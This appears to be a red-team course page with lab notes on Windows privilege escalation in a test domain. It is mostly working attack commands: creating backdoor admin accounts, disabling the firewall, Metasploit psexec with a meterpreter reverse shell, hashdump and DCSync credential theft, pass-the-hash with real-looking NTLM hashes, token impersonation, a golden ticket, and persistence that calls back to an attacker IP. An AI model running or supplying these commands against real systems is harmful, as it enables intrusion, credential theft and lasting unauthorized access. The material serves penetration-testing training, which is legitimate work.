Windows Local Privilege Escalation Mastery – Red Team
The Windows Privilege Escalation Mastery course is a comprehensive and hands-on training program designed for cybersecurity professionals, system administrators, penetration testers, and anyone seeking to enhance their skills in identifying and exploiting privilege escalation vulnerabilities within Windows environments. This immersive course will equip participants with in-depth knowledge and practical techniques to escalate privileges on Windows systems securely and efficiently.
Key Learning Objectives:
-
Understanding Windows Privilege Models: Gain insights into Windows privilege models, user permissions, and the underlying mechanisms that govern user access rights.
-
Exploiting Vulnerabilities: Learn how to identify and exploit common privilege escalation vulnerabilities in Windows, including misconfigurations, weak file permissions, insecure services, and more.
-
Enumeration Techniques: Master the art of enumerating users, groups, services, and system information to identify potential privilege escalation opportunities.
-
Kernel Exploits: Explore advanced techniques to escalate privileges through kernel-level exploits, understanding Windows kernel architecture, and bypassing security mechanisms.
-
Post-Exploitation Strategies: Learn post-exploitation methodologies to maintain persistent access and cover tracks after privilege escalation.
Course Features:
-
Expert Instructors: Learn from seasoned cybersecurity professionals with extensive experience in penetration testing and Windows security.
-
Cutting-Edge Tools: Familiarize yourself with the latest tools and utilities used for Windows privilege escalation.
-
Practical Tips and Best Practices: Get insider tips, tricks, and best practices to conduct privilege escalation assessments effectively and efficiently.
Privilege Escalation - Manually
The commands executed can be found here:
The commands executed can be found here:
#change directory to where Jaws is located
cd c:ad
#Run from CMD:
powershell.exe -ExecutionPolicy Bypass -File .jaws-enum.ps1 -OutputFilename JAWS-Enum.txt
#Manually Search
schtasks /query /fo LIST 2>nul | findstr TaskName
Get-ScheduledTask | where {$_.TaskPath -notlike "Microsoft*"} | ft TaskName,TaskPath,State
schtasks /query /fo LIST /v > C:Usersstudent1Desktoptask.txt
#Edit the file executed by Administrator
net user /add rabakuku Password123
net localgroup administrators rabakuku /add
#reboot
#open cmd
shutdown /r /f
Zerologon, tracked as CVE-2020-1472, is an authentication bypass vulnerability in the Netlogon Remote Protocol (MS-NRPC), a remote procedure call (RPC) interface that Windows uses to authenticate users and computers on domain-based networks. It was designed for specific tasks such as maintaining relationships between members of domains and the domain controller (DC), or between multiple domain controllers across one or multiple domains and replicating the domain controller database.
Local Privilege Escalation With EvilWinRM
AMSI
AntiMalware Scan Interface
Windows AMSI is integrated into the following components:
PowerShell (scripts, interactive use, and dynamic code evaluation)
PowerShell ISE (Windows PowerShell-IDE)
Windows Script Host (Wscript.exe and Cscript.exe) (scripts and dynamic code evaluation)
User Account Control (UAC) (using a different type of AMSI-provider)
Office365 (JavaScript/VBA)
Office365 (Documents)
.Net Framework 4.8 (Scanning for all assemblies)
Windows Management Instrumentation (WMI)
upload: local files can be auto-completed using tab key. It is not needed to put a remote_path if the local file is in the same directory as evil-winrm.rb file.
usage: upload local_path remote_path
download: it is not needed to set local_path if the remote file is in the current directory.
usage: download remote_path local_path
services: list all services. No administrator permissions needed.
User Enumeration
Get current username
echo %USERNAME% || whoami
$env:username
List user privilege
whoami /priv
whoami /groups
List all users
net user
whoami /all
Get-LocalUser | ft Name,Enabled,LastLogon
Get-ChildItem C:Users -Force | select Name
List logon requirements; useable for bruteforcing
net accounts
Get details about a user (i.e. administrator, admin, current user)
net user administrator
net user admin
net user %USERNAME%
List all local groups
net localgroup
Get-LocalGroup | ft Name
Get details about a group (i.e. administrators)
net localgroup administrators
Get-LocalGroupMember Administrators | ft Name, PrincipalSource
Get-LocalGroupMember Administrateurs | ft Name, PrincipalSource
Network Enumeration
List all network interfaces, IP, and DNS.
ipconfig /all
Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
Get-DnsClientServerAddress -AddressFamily IPv4 | ft
List current routing table
route print
Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex
List the ARP table
arp -A
Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State
List all current connections
netstat -ano
List firewall state and current configuration
netsh advfirewall firewall dump
netsh firewall show state
netsh firewall show config
List firewall's blocked ports
$f=New-object -comObject HNetCfg.FwPolicy2;$f.rules | where {$_.action -eq "0"} | select name,applicationname,localports
Disable firewall
netsh firewall set opmode disable
netsh advfirewall set allprofiles state off
List all network shares
net share
SNMP Configuration
reg query HKLMSYSTEMCurrentControlSetServicesSNMP /s
Get-ChildItem -path HKLM:SYSTEMCurrentControlSetServicesSNMP -Recurse
Windows Local Privilege Escalation With Empire
sudo apt install powershell-empire
sudo powershell-empire
Listeners
help
uselistener http
info <- it will display all the options that you can tweak
BindIP to Kali’s IP address
Port to any port number other than 80
execute
net user raba Password123 /add
net localgroup administrators raba /add
net localgroup "Remote Management Users" raba /add
remove old
Windows Local Privilege Escalation With Metasploit
Metasploit is a penetration testing framework that makes hacking simple. It's an essential tool for many attackers and defenders. Point Metasploit at your target, pick an exploit, what payload to drop, and hit Enter.
Check if it is exploitable:
use exploit/windows/smb/ms17_010_psexec
set rhosts 192.168.1.53
set smbpass Password123
set smbuser student1
set smbdomain pentesting.local
set paylod windows/meterpreter/reverse_tcp
run
/
Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime. It communicates over the stager socket and provides a comprehensive client-side Ruby API. It features command history, tab completion, channels, and more.
use Auxiliary/gather/Kerberos_enumusers
sysinfo
ps
post/windows/gather/enum_ad_users
post/windows/gather/enum_domain_group_users
post/windows/gather/enum_logged_on_users
post/windows/gather/enum_ad_user_comments
post/windows/gather/enum_domain_group_users
post/windows/gather/enum_domain
post/windows/gather/enum_computers
post/windows/gather/resolve_sid.rb
run post/windows/gather/enum_ad_computers.rb
post/windows/gather/local_admin_search_enum
post/windows/gather/enum_ad_service_principal_names
run post/windows/gather/arp_scanner RHOSTS=192.168.1.0/24
ipconfig
netstat
route
#Windows Gather Enumerate Domain Admin Tokens (T
post/windows/gather/enum_tokens
post/windows/gather/enum_patches
post/windows/gather/credentials/winscp
#Windows Gather Powershell Environment Setting E
post/windows/gather/enum_powershell_env
post/windows/gather/enum_ie
post/windows/gather/bloodhound
for More
search post/windows/gather/
use post/windows/gather/enum_shares
use post/windows/gather/enum_services
use post/windows/gather/enum_snmp
use post/windows/gather/enum_chrome
use post/windows/gather/enum_av_excluded
use post/windows/gather/enum_putty_saved_sessions
use post/windows/gather/enum_applications
use post/windows/gather/win_privs
use post/windows/gather/forensics/browser_history
for more:
search post/windows/gather/
LOCAL_EXPLOIT_SUGGESTER
run post/multi/recon/local_exploit_suggester
post/windows/gather/win_privs
post/windows/manage/add_user
set addtogroup true
set username test
set group administrators
set session 2
post/windows/manage/delete_user
search hashdump
search credential_collector
post/windows/gather/hashdump
post/windows/gather/credentials/credential_collector
meterpreter > load kiwi
meterpreter > help
Testing Credentials
crackmapexec smb 192.168.1.50 192.168.1.55 -u ippsec -p Password123!
Pass The Hash with Psexec: Due to perform this jobs, only we need is NTLM hash of a privileged user. Thats exactly what we gained before with mimikatz.
use exploit/windows/smb/psexec
set SMBDomain pentesting.local
set smbuser ippsec
set SMBPass e52cac67419a9a22c17ec4fe2a5374cb:2b576acbe6bcfda7294d6bd18041b8fe
set rhosts 192.168.1.55
set lport 4457
options
load kiwi
creds_msv
00000000000000000000000000000000
see if user is part of Domain Users
use post/windows/gather/enum_domain_group_users
Pass The Hash with Psexec: Due to perform this jobs, only we need is NTLM hash of a privileged user. Thats exactly what we gained before with mimikatz.
use exploit/windows/smb/psexec
set SMBDomain pentesting.local
set smbuser s4vitar
set SMBPass 00000000000000000000000000000000:58a478135a93ac3bf058a5ea0e8fdb71
set rhosts 192.168.1.50
set lport 4457
options
load kiwi
creds_msv
00000000000000000000000000000000
see if user is part of Domain Users
use post/windows/gather/enum_domain_group_users
use post/windows/gather/credentials/domain_hashdump
scanner/smb/impacket/secretsdump
In metasploit framework there is an extension which is called incognito which allows us to perform activities such as token stealing and manipulation.These kind of activities are important in the privilege escalation stage of a penetration test because if we can steal the token of an administrator for example we can perform higher privilege operations on the target.
use post/windows/gather/credentials/domain_hashdump
use incognito
list_tokens -u
impersonate_token PENTESTING\Administrator
From Domain Controller
meterpreter > use incognito
meterpreter > impersonate_token PENTESTING\Administrator
meterpreter > load kiwi
meterpreter > help
meterpreter > kiwi_cmd '"lsadump::dcsync /user:Administrator"'
meterpreter > kiwi_cmd '"lsadump::dcsync /user:krbtgt"'
use post/windows/escalate/golden_ticket
Golden Ticket attacks can be carried out against Active Directory domains, where access control is implemented using Kerberos tickets issued to authenticated users by a Key Distribution Service.
The attacker gains control over the domain’s Key Distribution Service account (KRBTGT account) by stealing its NTLM hash. This allows the attacker to generate Ticket Granting Tickets (TGTs) for any account in the Active Directory domain.
With valid TGTs, the attacker can request access to any resource/system on its domain from the Ticket Granting Service (TGS).
Because the attacker is controlling the component of the access control system that is responsible for issuing Ticket Granting Tickets (TGTs), then he has the golden ticket to access any resource on the domain.
kerberos_ticket_list
kerberos_ticket_use /root/.msf4/loot/20210501011013_default_192.168.1.50_golden.ticket_888290.bin
After going through all the hard work of exploiting a system, it’s often a good idea to leave yourself an easier way back into the system for later use. This way, if the service you initially exploited is down or patched, you can still gain access to the system. Metasploit has a Meterpreter script, persistence.rb, that will create a Meterpreter service that will be available to you even if the remote system is rebooted.
meterpreter > run persistence -h
meterpreter > run persistence -U -i 5 -p 4458 -r 192.168.1.223
meterpreter > exit
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.223
set LPORT 4458
exploit
When a user logs in to the remote system, a Meterpreter session is opened up for us.
Be the first to add a review.
